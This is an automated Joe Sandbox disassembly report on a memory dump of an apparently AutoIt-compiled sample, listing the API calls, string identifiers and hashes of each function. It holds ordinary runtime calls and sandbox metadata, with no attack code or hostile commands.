                                                                                                                                                                              • Opcode Fuzzy Hash: 25df89f7b867d8ac3c595c65ddccb6e7ce3e0cc06ad21a3130d5bd0f86ceccff
                                                                                                                                                                              • Instruction Fuzzy Hash: 3AA193342042019BDB04EF15C991FAABBE6FF44358F14486EB8969B3D2DB38EC49CB55
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 004EDD87
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004EDE28
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004EDE3B
                                                                                                                                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 004EDE90
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004EDECC
                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000400), ref: 004EDF03
                                                                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 004EDF55
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004EDF8B
                                                                                                                                                                              • GetParent.USER32(?), ref: 004EDFA9
                                                                                                                                                                              • ScreenToClient.USER32(00000000), ref: 004EDFB0
                                                                                                                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 004EE02A
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004EE03E
                                                                                                                                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 004EE064
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004EE078
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                                                                              • String ID: %s%u
                                                                                                                                                                              • API String ID: 3119225716-679674701
                                                                                                                                                                              • Opcode ID: 8ed79889a3d3e2383eac8d8f75fafcf067f055b9dbe910c2987b74b944c99d8d
                                                                                                                                                                              • Instruction ID: 6a7c07c58302f1f5d560d03e1cf8e97c92bc361e960856099742ed84b1f8e981
                                                                                                                                                                              • Opcode Fuzzy Hash: 8ed79889a3d3e2383eac8d8f75fafcf067f055b9dbe910c2987b74b944c99d8d
                                                                                                                                                                              • Instruction Fuzzy Hash: 8BA10131604746ABD714DF26C884FABB7A8FF54315F00852BF9A9C3290DB78E905CBA5
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 004EE6E1
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004EE6F2
                                                                                                                                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 004EE71A
                                                                                                                                                                              • CharUpperBuffW.USER32(?,00000000), ref: 004EE737
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004EE755
                                                                                                                                                                              • _wcsstr.LIBCMT ref: 004EE766
                                                                                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 004EE79E
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004EE7AE
                                                                                                                                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 004EE7D5
                                                                                                                                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 004EE81E
                                                                                                                                                                              • _wcscmp.LIBCMT ref: 004EE82E
                                                                                                                                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 004EE856
                                                                                                                                                                              • GetWindowRect.USER32(00000004,?), ref: 004EE8BF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                                              • String ID: @$ThumbnailClass
                                                                                                                                                                              • API String ID: 1788623398-1539354611
                                                                                                                                                                              • Opcode ID: f264c6a15a45ab40c0de2e212053fbd954dd2c14c90ab01af77fe8688beaa757
                                                                                                                                                                              • Instruction ID: 900a516a1f8edef4e22566393462418eec093717c7f192456dc3264aeac190ef
                                                                                                                                                                              • Opcode Fuzzy Hash: f264c6a15a45ab40c0de2e212053fbd954dd2c14c90ab01af77fe8688beaa757
                                                                                                                                                                              • Instruction Fuzzy Hash: 2981BE710042859BDB01DF13D881BAB7BE8FF54315F04846BFD899A292DB38DD46CBA9
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __wcsnicmp
                                                                                                                                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                                              • API String ID: 1038674560-1810252412
                                                                                                                                                                              • Opcode ID: 9131961253d2bc6f4ff7a439938e9ebbdacf22e8e4fac0a72b3e4da622701800
                                                                                                                                                                              • Instruction ID: 2f2150b00d76be13bc782b86bbf785f7dd713d30bc1e4c6f79d33e1104f43d16
                                                                                                                                                                              • Opcode Fuzzy Hash: 9131961253d2bc6f4ff7a439938e9ebbdacf22e8e4fac0a72b3e4da622701800
                                                                                                                                                                              • Instruction Fuzzy Hash: 2131C331944645B5EB14EB63CD53EEE77A46F20709F20002BF441721E5FF596F04C66A
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadIconW.USER32(00000063), ref: 004EF8AB
                                                                                                                                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004EF8BD
                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 004EF8D4
                                                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 004EF8E9
                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004EF8EF
                                                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 004EF8FF
                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004EF905
                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004EF926
                                                                                                                                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004EF940
                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 004EF949
                                                                                                                                                                              • SetWindowTextW.USER32(?,?), ref: 004EF9B4
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 004EF9BA
                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 004EF9C1
                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 004EFA0D
                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 004EFA1A
                                                                                                                                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 004EFA3F
                                                                                                                                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004EFA6A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3869813825-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 0050026A
                                                                                                                                                                              • _wcschr.LIBCMT ref: 00500278
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 0050028F
                                                                                                                                                                              • _wcscat.LIBCMT ref: 0050029E
                                                                                                                                                                              • _wcscat.LIBCMT ref: 005002BC
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 005002DD
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 005003BA
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 005003DF
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 005003F1
                                                                                                                                                                              • _wcscpy.LIBCMT ref: 00500406
                                                                                                                                                                              • _wcscat.LIBCMT ref: 0050041B
                                                                                                                                                                              • _wcscat.LIBCMT ref: 0050042D
                                                                                                                                                                              • _wcscat.LIBCMT ref: 00500442
                                                                                                                                                                                • Part of subcall function 004FC890: _wcscmp.LIBCMT ref: 004FC92A
                                                                                                                                                                                • Part of subcall function 004FC890: __wsplitpath.LIBCMT ref: 004FC96F
                                                                                                                                                                                • Part of subcall function 004FC890: _wcscpy.LIBCMT ref: 004FC982
                                                                                                                                                                                • Part of subcall function 004FC890: _wcscat.LIBCMT ref: 004FC995
                                                                                                                                                                                • Part of subcall function 004FC890: __wsplitpath.LIBCMT ref: 004FC9BA
                                                                                                                                                                                • Part of subcall function 004FC890: _wcscat.LIBCMT ref: 004FC9D0
                                                                                                                                                                                • Part of subcall function 004FC890: _wcscat.LIBCMT ref: 004FC9E3
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                                                                                                                                              • String ID: >>>AUTOIT SCRIPT<<<
                                                                                                                                                                              • API String ID: 2955681530-2806939583
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 0051CD0B
                                                                                                                                                                              • DestroyWindow.USER32(00000000,?), ref: 0051CD83
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0051CE04
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0051CE26
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0051CE35
                                                                                                                                                                              • DestroyWindow.USER32(?), ref: 0051CE52
                                                                                                                                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,004B0000,00000000), ref: 0051CE85
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0051CEA4
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0051CEB9
                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 0051CEC0
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0051CED2
                                                                                                                                                                              • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0051CEEA
                                                                                                                                                                                • Part of subcall function 004CB155: GetWindowLongW.USER32(?,000000EB), ref: 004CB166
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                                                                                                              • String ID: 0$tooltips_class32
                                                                                                                                                                              • API String ID: 1297703922-3619404913
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                                                                                                                                              • DragQueryPoint.SHELL32(?,?), ref: 0051F14B
                                                                                                                                                                                • Part of subcall function 0051D5EE: ClientToScreen.USER32(?,?), ref: 0051D617
                                                                                                                                                                                • Part of subcall function 0051D5EE: GetWindowRect.USER32(?,?), ref: 0051D68D
                                                                                                                                                                                • Part of subcall function 0051D5EE: PtInRect.USER32(?,?,0051EB2C), ref: 0051D69D
                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0051F1B4
                                                                                                                                                                              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0051F1BF
                                                                                                                                                                              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0051F1E2
                                                                                                                                                                              • _wcscat.LIBCMT ref: 0051F212
                                                                                                                                                                              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0051F229
                                                                                                                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 0051F242
                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0051F259
                                                                                                                                                                              • SendMessageW.USER32(?,000000B1,?,?), ref: 0051F27B
                                                                                                                                                                              • DragFinish.SHELL32(?), ref: 0051F282
                                                                                                                                                                              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0051F36D
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                                                                                                              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                                                                              • API String ID: 169749273-3440237614
APIs
• VariantInit.OLEAUT32(00000000), ref: 004FB46D
• VariantCopy.OLEAUT32(?,?), ref: 004FB476
• VariantClear.OLEAUT32(?), ref: 004FB482
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 004FB561
• __swprintf.LIBCMT ref: 004FB591
• VarR8FromDec.OLEAUT32(?,?), ref: 004FB5BD
• VariantInit.OLEAUT32(?), ref: 004FB63F
• SysFreeString.OLEAUT32(00000016), ref: 004FB6D1
• VariantClear.OLEAUT32(?), ref: 004FB727
• VariantClear.OLEAUT32(?), ref: 004FB736
• VariantInit.OLEAUT32(00000000), ref: 004FB772
Strings
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 3730832054-3931177956
APIs
• CharUpperBuffW.USER32(?,?), ref: 00516FF9
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00517044
Strings
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0051E3BB
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0051BCBF), ref: 0051E417
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0051E457
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0051E49C
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0051E4D3
• FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0051BCBF), ref: 0051E4DF
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0051E4EF
• DestroyIcon.USER32(?,?,?,?,?,0051BCBF), ref: 0051E4FE
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0051E51B
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0051E527
  • Part of subcall function 004D1BC7: __wcsicmp_l.LIBCMT ref: 004D1C50
Strings
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
Similarity
• API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
• String ID: .dll$.exe$.icl
• API String ID: 1212759294-1154884017
APIs
• GetLocalTime.KERNEL32(?), ref: 00500EFF
• SystemTimeToFileTime.KERNEL32(?,?), ref: 00500F0F
• LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00500F1B
• __wsplitpath.LIBCMT ref: 00500F79
• _wcscat.LIBCMT ref: 00500F91
• _wcscat.LIBCMT ref: 00500FA3
• GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00500FB8
• SetCurrentDirectoryW.KERNEL32(?), ref: 00500FCC
• SetCurrentDirectoryW.KERNEL32(?), ref: 00500FFE
• SetCurrentDirectoryW.KERNEL32(?), ref: 0050101F
• _wcscpy.LIBCMT ref: 0050102B
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0050106A
Strings
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
Similarity
• API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
• String ID: *.*
• API String ID: 3566783562-438819550
APIs
  • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
  • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
• CharLowerBuffW.USER32(?,?), ref: 004FDB26
• GetDriveTypeW.KERNEL32 ref: 004FDB73
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004FDBBB
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004FDBF2
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004FDC20
  • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
Strings
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
APIs
• GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00524085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 004F3145
• LoadStringW.USER32(00000000,?,00524085,00000016), ref: 004F314E
  • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
• GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00524085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 004F3170
• LoadStringW.USER32(00000000,?,00524085,00000016), ref: 004F3173
• __swprintf.LIBCMT ref: 004F31B3
• __swprintf.LIBCMT ref: 004F31C5
• _wprintf.LIBCMT ref: 004F326C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 004F3283
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                              • API String ID: 984253442-2268648507
                                                                                                                                                                              • Opcode ID: 9cf6deb95a549be348021a5d13bf203143d6f9d11130e406b0965cb5daa60ace
                                                                                                                                                                              • Instruction ID: 825197bbeac793b1653b2394dcbcbd447a4ff6690cc61aa41457e70d9b8aa668
                                                                                                                                                                              • Opcode Fuzzy Hash: 9cf6deb95a549be348021a5d13bf203143d6f9d11130e406b0965cb5daa60ace
                                                                                                                                                                              • Instruction Fuzzy Hash: A641637190021DA6CB04FBE2DD86EEFB778AF14705F10046BF601B21A2DA696F08DA75
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004FD96C
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004FD98E
                                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 004FD9CB
                                                                                                                                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 004FD9F0
                                                                                                                                                                              • _memset.LIBCMT ref: 004FDA0F
                                                                                                                                                                              • _wcsncpy.LIBCMT ref: 004FDA4B
                                                                                                                                                                              • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 004FDA80
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004FDA8B
                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?), ref: 004FDA94
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004FDA9E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                                              • String ID: :$\$\??\%s
                                                                                                                                                                              • API String ID: 2733774712-3457252023
                                                                                                                                                                              • Opcode ID: e83d726eb1a8284ab98aba64368967b4a2ceee9f1c7fa14d6286a3586948e49f
                                                                                                                                                                              • Instruction ID: d9a7e391e1c64afbccb4ed3cf81b14e8f87803592e1b1f3c0ae738b7e864f8b5
                                                                                                                                                                              • Opcode Fuzzy Hash: e83d726eb1a8284ab98aba64368967b4a2ceee9f1c7fa14d6286a3586948e49f
                                                                                                                                                                              • Instruction Fuzzy Hash: FB31C87290020CABDB20DFA4DC49FEB77BDBF94704F0081A6F615D2260E7749A45DBA5
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0051BD04,?,?), ref: 0051E564
                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E57B
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E586
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E593
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0051E59C
                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E5AB
                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0051E5B4
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E5BB
                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E5CC
                                                                                                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0053D9BC,?), ref: 0051E5E5
